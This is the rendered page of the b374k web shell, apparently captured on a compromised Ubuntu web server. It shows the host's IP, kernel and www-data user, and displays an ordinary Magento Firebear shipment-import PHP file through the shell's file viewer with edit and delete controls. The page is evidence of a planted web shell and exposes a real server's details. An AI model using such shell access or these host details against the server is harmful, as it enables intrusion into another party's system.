b374k
m1n1 1.01
Apache/2.4.41 (Ubuntu)
Linux vmi616275.contaboserver.net 5.4.0-84-generic #94-Ubuntu SMP Thu Aug 26 20:27:37 UTC 2021 x86_64
uid=33(www-data) gid=33(www-data) groups=33(www-data)
server ip : 62.171.164.128 | your ip : 127.0.0.1
safemode OFF
 >  / home / a / home / dev2.destoffenstraat.com / app / Firebear / ImportExport / Model / Import / Order /
Filename/home/a/home/dev2.destoffenstraat.com/app/Firebear/ImportExport/Model/Import/Order/Shipment.php
Size7.08 kb
Permissionrwxr-xr-x
Ownerroot : root
Create time21-Aug-2025 12:26
Last modified07-Nov-2022 06:44
Last accessed23-Aug-2025 10:35
Actionsedit | rename | delete | download (gzip)
Viewtext | code | image
<?php
/**
* @copyright: Copyright © 2017 Firebear Studio. All rights reserved.
* @author : Firebear Studio <fbeardev@gmail.com>
*/
namespace Firebear\ImportExport\Model\Import\Order;

use Magento\Framework\Exception\LocalizedException;
use Magento\ImportExport\Model\Import;

/**
* Order Shipment Import
*/
class Shipment extends AbstractAdapter
{
/**
* Entity Type Code
*
*/
const ENTITY_TYPE_CODE = 'order';

/**
* Prefix of Fields
*
*/
const PREFIX = 'shipment';

/**
* Entity Id Column Name
*
*/
const COLUMN_ENTITY_ID = 'entity_id';

/**
* Order Id Column Name
*
*/
const COLUMN_ORDER_ID = 'entity_id';

/**
* Error Codes
*/
const ERROR_ENTITY_ID_IS_EMPTY = 'shipmentEntityIdIsEmpty';
const ERROR_DUPLICATE_ENTITY_ID = 'duplicateShipmentEntityId';
const ERROR_DUPLICATE_INCREMENT_ID = 'duplicateShipmentIncrementId';
const ERROR_INCREMENT_ID_IS_EMPTY = 'shipmentIncrementIdIsEmpty';

/**
* Validation Failure Message Template Definitions
*
* @var array
*/
protected $_messageTemplates = [
self::ERROR_DUPLICATE_ENTITY_ID => 'Shipment entity_id is found more than once in the import file',
self::ERROR_DUPLICATE_INCREMENT_ID => 'Shipment increment_id is found more than once in the import file',
self::ERROR_ENTITY_ID_IS_EMPTY => 'Shipment entity_id is empty',
self::ERROR_INCREMENT_ID_IS_EMPTY => 'Shipment increment_id is empty',
];

/**
* Order Shipment Table Name
*
* @var string
*/
protected $_mainTable = 'sales_shipment';

/**
* Retrieve The Prepared Data
*
* @param array $rowData
* @return array|bool
*/
public function prepareRowData(array $rowData)
{
$this->prepareCurrentOrderId($rowData);
$rowData = $this->_extractField($rowData, static::PREFIX);
if (!empty($rowData['shipping_label'])) {
$rowData['shipping_label'] = base64_decode($rowData['shipping_label']);
}

return (count($rowData) && !$this->isEmptyRow($rowData))
? $rowData
: false;
}

/**
* Retrieve Entity Id If Entity Is Present In Database
*
* @param array $rowData
* @return bool|int
*/
protected function _getExistEntityId(array $rowData)
{
$bind = [':increment_id' => $rowData[self::COLUMN_INCREMENT_ID]];
/** @var $select \Magento\Framework\DB\Select */
$select = $this->_connection->select();
$select->from($this->getMainTable(), 'entity_id')
->where('increment_id = :increment_id');

return $this->_connection->fetchOne($select, $bind);
}

/**
* Retrieve Shipping Address Id
*
* @param array $rowData
* @return bool|int
*/
protected function _getShippingAddressId($rowData)
{
$bind = [
':address_type' => 'shipping',
':parent_id' => $this->_getOrderId($rowData)
];
/** @var $select \Magento\Framework\DB\Select */
$select = $this->_connection->select();
$select->from($this->getAddressTable(), 'entity_id')
->where('parent_id = :parent_id')
->where('address_type = :address_type');

return $this->_connection->fetchOne($select, $bind);
}

/**
* Retrieve Billing Address Id
*
* @param array $rowData
* @return bool|int
*/
protected function _getBillingAddressId($rowData)
{
$bind = [
':address_type' => 'billing',
':parent_id' => $this->_getOrderId($rowData)
];
/** @var $select \Magento\Framework\DB\Select */
$select = $this->_connection->select();
$select->from($this->getAddressTable(), 'entity_id')
->where('parent_id = :parent_id')
->where('address_type = :address_type');

return $this->_connection->fetchOne($select, $bind);
}

/**
* Prepare Data For Update
*
* @param array $rowData
* @return array
*/
protected function _prepareDataForUpdate(array $rowData)
{
$toCreate = [];
$toUpdate = [];

$newEntity = false;
list($createdAt, $updatedAt) = $this->_prepareDateTime($rowData);
$entityId = $this->_getExistEntityId($rowData);
if (!$entityId) {
/* create new entity id */
$newEntity = true;
$entityId = $this->_getNextEntityId();
$this->_newEntities[$rowData[self::COLUMN_INCREMENT_ID]] = $entityId;
}

$key = $rowData[self::COLUMN_ENTITY_ID] ?? $entityId;
$this->shipmentIdsMap[$key] = $entityId;

if (!$newEntity && empty($rowData[self::COLUMN_ORDER_ID])) {
$orderId = $this->_getOrderIdByShipment($rowData);
if (empty($this->orderIdsMap[$orderId])) {
$this->orderIdsMap[$orderId] = $orderId;
}
$rowData[self::COLUMN_ORDER_ID] = $orderId;
$this->_currentOrderId = $orderId;
}

$entityRow = [
'created_at' => $createdAt,
'updated_at' => $updatedAt,
'order_id' => $this->_getOrderId($rowData),
'shipping_address_id' => $this->_getShippingAddressId($rowData),
'billing_address_id' => $this->_getBillingAddressId($rowData),
'entity_id' => $entityId
];
/* prepare data */
$entityRow = $this->_prepareEntityRow($entityRow, $rowData);
if ($newEntity) {
$toCreate[] = $entityRow;
} else {
$toUpdate[] = $entityRow;
}

return [
self::ENTITIES_TO_CREATE_KEY => $toCreate,
self::ENTITIES_TO_UPDATE_KEY => $toUpdate
];
}

/**
* Validate Row Data For Add/Update Behaviour
*
* @param array $rowData
* @param int $rowNumber
* @return void
*/
protected function _validateRowForUpdate(array $rowData, $rowNumber)
{
if ($this->_checkIncrementIdKey($rowData, $rowNumber)) {
$incrementId = $rowData[self::COLUMN_INCREMENT_ID];
if (isset($this->_newEntities[$incrementId])) {
$this->addRowError(self::ERROR_DUPLICATE_INCREMENT_ID, $rowNumber);
}
}
}

/**
* Validate Row Data For Delete Behaviour
*
* @param array $rowData
* @param int $rowNumber
* @return void
*/
protected function _validateRowForDelete(array $rowData, $rowNumber)
{
$this->_checkIncrementIdKey($rowData, $rowNumber);
}

/**
* Retrieve Order Id If Shipment Is Present In Database
*
* @param array $rowData
* @return bool|int
*/
protected function _getOrderIdByShipment(array $rowData)
{
$bind = [':increment_id' => $rowData[self::COLUMN_INCREMENT_ID]];
/** @var $select \Magento\Framework\DB\Select */
$select = $this->_connection->select();
$select->from($this->getShipmentTable(), 'order_id')
->where('increment_id = :increment_id');

return $this->_connection->fetchOne($select, $bind);
}
}